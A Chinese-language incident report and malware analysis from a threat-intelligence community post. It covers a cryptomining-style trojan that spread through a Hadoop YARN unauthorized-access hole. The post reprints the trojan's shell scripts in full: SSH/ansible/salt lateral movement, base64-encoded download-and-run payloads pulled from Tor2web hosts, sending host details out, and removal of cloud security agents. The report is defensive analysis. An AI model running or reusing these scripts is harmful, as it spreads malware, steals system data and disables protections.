入侵 我被攻击了 求溯源
生产网主机被攻陷,揪出木马一枚。 奖励¥1000
微步情报局 2019-11-13 12:48:08 1731人浏览
情报提交人:
匿名用户
情报简介:
分析排查:

1、    防火墙流量告警了生产网的某台网服务器,根据告警相关信息上机排查,找到木马可执行程序/home/.systemd-init,木马创建时间为2019-10-09,

2、    如下木马正在下载木马并执行,使用的方法是解码base64加密的数据并执行

3、    木马的定时任务如下,每一小时都会执行一次木马程序.systemd-init

4、    在存在木马的系统中发现Hadoop yarn未授权访问漏洞利用痕迹,

5、    以下是对应漏洞利用日志,漏洞利用日志显示攻击者使用dr.who账号创建了hadoop的恶意容器实例。

6、    攻击者使用的dr.who用户 ,目标ip地址为内网其他机器IP


7、    在内网中发现的系统中的木马程序,进程名称为tracepath


8、    正在扫描内网的8088端口,8088端口只截取了少量扫描ip,下方还有很多,


9、    因为最早中木马机器中没有记录攻击者源Ip相关日志,并不能确定攻击源,但在内网中的另外一台机器中可以看到对内网8088端口hadoop yarn漏洞的扫描记录,推测是由这台机器对内网其他安装有hadoop的机器进行的攻击

 

样本分析:

木马使用了upx加壳,功能模块主要分为3部分:第一部分为初始化程序,主要功能包括清理其他木马以及卸载现有安全软件,第二部分为扩散程序,利用系统中的私钥去登录可能能够登录的主机,并执行下载木马并且执行的指令,第三部分为bot程序,bot程序具有内网扫描功能和漏洞利用功能


1. 对于本次木马的独立动态分析,以下是提取的攻击者使用的木马初始化脚本,用于清理其他恶意软件:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
find ~/.ddg/*|xargs fuser -k;fuser -k /tmp/.X11-lock /tmp/.X1-lock/tmp/.X1M-unix
find /etc/cron*|xargs chattr -i;grep -RE\"(wget|curl|systemd-login)\" /etc/cron.*|cut -f 1 -d :|xargs rm -f
crontab -l |sed '/wget/d'|sed '/curl/d'|sed '/systemd-login/d'|sed'/tmp00/d'|sed '/\\upd/d'|sed '/X13/d'|sed '/X17/d'|sed '/firefoxcatche/d'|sed'/nullcache/d'|crontab -
pkill -9 -f\"./cron|8220|aecc2ec|aegis_|AliHids|AliYunDun|aliyun-service|azipl|cr.sh|cronds|crun|cryptonight|ddgs|fs-manager|finJG|havegeds|hashfish|hwlh3wlh44lh|HT8s|gf128mul|java-c|kerberods|khugepageds|kintegrityds|kpsmouseds|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|miner|mr.sh|muhsti|mygit|networkservice|orgfs|pastebin|qW3xT|qwefdas|sleep|stratum|sustes|sustse|sysguard|t00ls|thisxxs|/tmp/ddgs|/tmp/java|/tmp/udevs|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|X13-unix|X17-unix|zer0\"
rm -rf ~/.wget-* ~/.tmp00 /tmp/.X13-unix /tmp/.X17-unix /tmp/.X11-lock/tmp/.X1-lock /tmp/.X1M-unix ~/.systemd-login /etc/cron.d/systemd/lib/systemd/systemd-login;echo 1 > /tmp/.XIMunix;echo 1 > /tmp/.XImunix;
grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts
grep -q intel /etc/hosts && sed -i '/intel/d' /etc/hosts
grep -q \"0.0.0.0 pastebin.com\" /etc/hosts || echo \"0.0.0.0pastebin.com\" >>/etc/hosts
grep -q \"0.0.0.0 lsd.systemten.org\" /etc/hosts || echo\"0.0.0.0 lsd.systemten.org\"


2.该脚本程序主要目的是使用ssh远程登陆系统中known_hosts文件,及历史纪录等能够登录的主机并且进行下载木马的操作,使用ansible工具进行批量部署下载木马,并会下载bot操作:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
w=\"wget -t1 -T180 -qU- -O- --no-check-certificate\"
c=\"curl -m180 -fsSLkA-\"
xssh() {
ssh -oBatchMode=yes -oConnectTimeout=5-oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no$1@$2 'echo ****Pi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQiICIpCndnZXQgLXQxIC1UMTgwIC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSRmIC1vJGQKY2htb2QgK3ggJGQ7JGQ7cm0gLWYgJGQKfQpmb3IgaCBpbiB0b3Iyd2ViLmlvIGQyd2ViLm9yZyBvbmlvbi5pbi5uZXQgb25pb24uZ2xhc3Mgb25pb24ubW4gb25pb24udG8gb25pb24uc2ggb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgp4IGludGVsYmFnam9wN256bTUuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64-d|bash'
}
x1() {
f=/bot
d=$(curl -4fsSLk ip.sb||wget -4qO- ip.sb)_$(whoami)_$(uname -m)_$(uname-n)_$(crontab -l|base64 -w0)
$w --referer=$d $1$f || $c -e$d $1$f
}
x2() {
if ! netstat -antp |grep tracepath; then
f=/trc
d=./$(date|md5sum|cut -f1 -d\" \")
wget -t1 -T180 -qU- --no-check-certificate $1$f -O$d || $c $1$f -o$d
chmod +x $d;$d;rm -f $d
fi
}
x3() {
ansible all -m shell -a 'echo ***ZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQiICIpCndnZXQgLXQxIC1UMTgwIC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSRmIC1vJGQKY2htb2QgK3ggJGQ7JGQ7cm0gLWYgJGQKfQpmb3IgaCBpbiB0b3Iyd2ViLmlvIGQyd2ViLm9yZyBvbmlvbi5pbi5uZXQgb25pb24uZ2xhc3Mgb25pb24ubW4gb25pb24udG8gb25pb24uc2ggb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgp4IGludGVsYmFnam9wN256bTUuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64-d|bash'
knife ssh 'name:*' 'echo ***9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQiICIpCndnZXQgLXQxIC1UMTgwIC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSRmIC1vJGQKY2htb2QgK3ggJGQ7JGQ7cm0gLWYgJGQKfQpmb3IgaCBpbiB0b3Iyd2ViLmlvIGQyd2ViLm9yZyBvbmlvbi5pbi5uZXQgb25pb24uZ2xhc3Mgb25pb24ubW4gb25pb24udG8gb25pb24uc2ggb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgp4IGludGVsYmFnam9wN256bTUuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64-d|bash'
salt '*' cmd.run 
'echo ***9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQiICIpCndnZXQgLXQxIC1UMTgwIC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSRmIC1vJGQKY2htb2QgK3ggJGQ7JGQ7cm0gLWYgJGQKfQpmb3IgaCBpbiB0b3Iyd2ViLmlvIGQyd2ViLm9yZyBvbmlvbi5pbi5uZXQgb25pb24uZ2xhc3Mgb25pb24ubW4gb25pb24udG8gb25pb24uc2ggb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgp4IGludGVsYmFnam9wN256bTUuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64-d|bash'
hosts=$(grep -oE \"\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b\"~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
for h in $hosts;do xssh root $h; xssh $USER $h & done
}
x4() {
curl -V || apt-get -y install curl || yum -y install curl
wget -V || apt-get -y install wget || yum -y install wget
$w update.aegis.aliyun.com/download/uninstall.sh|bash
$w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
}
x1 ***
x2 ***
x3
x4


// ssh进入受害主机执行的初始化程序脚本

exec&>/dev/null

exportPATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

x() {

f=/int

d=./$(date|md5sum|cut-f1 -d" ")


//尝试多个不同的暗网源进行木马的下载

wget -t1 -T180-qU- --no-check-certificate $1$f -O$d || curl -m180 -fsSLkA- $1$f -o$d 

chmod +x$d;$d;rm -f $d

}

***


// do遍历不同的源

if ! ls/proc/$(cat /tmp/.X11-unix/0)/io; then

xintelbagjop7nzm5.$h拼接源并进行木马下载

else

break

fi

Done


3.bot下载成功后,会扫描内网8500端口,并进行漏洞利用操作,利用成功后又开启上一循环

[pid 12246]connect(1, {sa_family=AF_INET, sin_port=htons(8500),sin_addr=inet_addr("192.168.0.1")}, 16) = -1 EINPROGRESS (Operationnow in progress)

[pid 12249]connect(2, {sa_family=AF_INET, sin_port=htons(8500),sin_addr=inet_addr("192.168.0.2")}, 16) = -1 EINPROGRESS (Operationnow in progress)

[pid 12251]connect(3, {sa_family=AF_INET, sin_port=htons(8500),sin_addr=inet_addr("192.168.0.3")}, 16) = -1 EINPROGRESS (Operationnow in progress)



目标行业:
IT行业

奖励计划获奖情报所有权归微步在线所有。

微步在线有权对该情报进行使用、编辑、存储、复制、修改、创建衍生作品、交流、发布、公开执行、公开显示。